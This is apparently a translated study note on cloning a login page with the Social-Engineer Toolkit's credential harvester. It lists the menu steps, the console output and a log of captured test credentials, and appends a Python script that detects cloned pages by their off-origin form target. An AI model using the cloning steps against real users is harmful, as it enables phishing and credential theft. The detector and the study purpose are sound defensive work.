!!! These notes are for study and exchange only; do not use them for any other purpose !!!
setoolkit is a very useful social-engineering toolkit that bundles many tools; here the author only notes its simplest use.
Basic workflow for cloning a website with setoolkit:
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com

Select from the menu:
1) Social-Engineering Attacks
........
set> 1    # choose 1

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
........
set> 2    # choose 2

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
........
set:webattack>3    # choose 3

1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2    # choose 2: here we clone a site; an existing template or a manual import would also work

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.test.com/login.php    # enter the URL to clone

[*] Cloning the website: http://www.test.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y    # the author set APACHE to ON in set_config and kept the Apache directory at /var/www
[....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
. ok
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}    # press Enter to start
.....
Once a user visits the cloned site and submits data, we can see the log on the back end:
root@kali:/var/www# pwd
/var/www
root@kali:/var/www# ls
harvester_2014-06-01 18:12:39.762872.txt  index.html  post.php
root@kali:/var/www# cat harvester_2014-06-01\ 18\:12\:39.762872.txt
Array
(
    [log] => test
    [pwd] => 1234
    [wp-submit] => 登录
    [redirect_to] => http://www.test.com/login.php
    [testcookie] => 1
)
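The harvester log above shows the two traits a defender can look for in a cloned login page: the form submits to a host that is not the real site, while a hidden field (redirect_to) still points back at the real site so the victim is bounced there afterwards. The following Python script is an added example for this post, not code from the original article or from SET itself; it assumes the clone is served from a different host and that it keeps the original hidden redirect field, and the HTML snippets, the page URLs and the IP address 198.51.100.7 are all constructed for the example.

```python
"""Check a saved login page for forms that submit somewhere other than the site they imitate.

Added example (not part of the original post or of the SET project). Given the URL the page
was loaded from and the host the page claims to belong to, it resolves every <form action>
against the page URL and flags forms whose target host differs from the expected one. It also
reports hidden fields whose value is a URL on the expected host, the "redirect back to the real
site" pattern visible in the harvester log.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> with its action, method and the inputs it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("name") or "", (a.get("type") or "text").lower(), a.get("value") or "")
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def check_login_page(page_url, html, expected_host):
    """Return one finding per form that submits to a host other than expected_host."""
    parser = _FormCollector()
    parser.feed(html)
    expected = expected_host.lower()
    findings = []
    for form in parser.forms:
        target = urljoin(page_url, form["action"])       # relative actions resolve against the page
        target_host = (urlsplit(target).hostname or "").lower()
        if target_host == expected:
            continue                                      # form posts to the real site: nothing to report
        finding = {
            "action": target,
            "host": target_host,
            "method": form["method"],
            "indicators": ["form submits off-origin"],
        }
        for name, itype, value in form["inputs"]:
            value_host = (urlsplit(value).hostname or "").lower()
            if itype == "hidden" and value_host == expected:
                finding["indicators"].append(f"hidden field '{name}' redirects back to {expected_host}")
        findings.append(finding)
    return findings


# Constructed samples: the real login form and a copy served from another host whose
# form action was pointed at a local post.php (assumed clone behaviour, not taken from SET).
LEGIT_URL = "http://www.test.com/login.php"
LEGIT_HTML = """
<form action="/login.php" method="post">
  <input type="text" name="log"><input type="password" name="pwd">
  <input type="hidden" name="redirect_to" value="http://www.test.com/login.php">
  <input type="hidden" name="testcookie" value="1">
</form>"""

CLONE_URL = "http://198.51.100.7/index.html"
CLONE_HTML = LEGIT_HTML.replace('action="/login.php"', 'action="post.php"')

if __name__ == "__main__":
    print("legitimate page:", check_login_page(LEGIT_URL, LEGIT_HTML, "www.test.com"))
    print("cloned page:", check_login_page(CLONE_URL, CLONE_HTML, "www.test.com"))
```

The check is deliberately host-based rather than content-based: a clone copies the markup verbatim, so the visible page is identical and only where the credentials are sent differs. Run it against a page saved from the browser, passing the address bar URL as page_url and the domain the page pretends to be as expected_host.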
Notes:
The author does not come from a web-development background and is not very familiar with it. After a quick look at the two files index.html and post.php, it feels like cloning a site this way is still quite limited: the form must be submitted with POST for it to work. I am not sure whether that is right; if an expert passes by, please advise.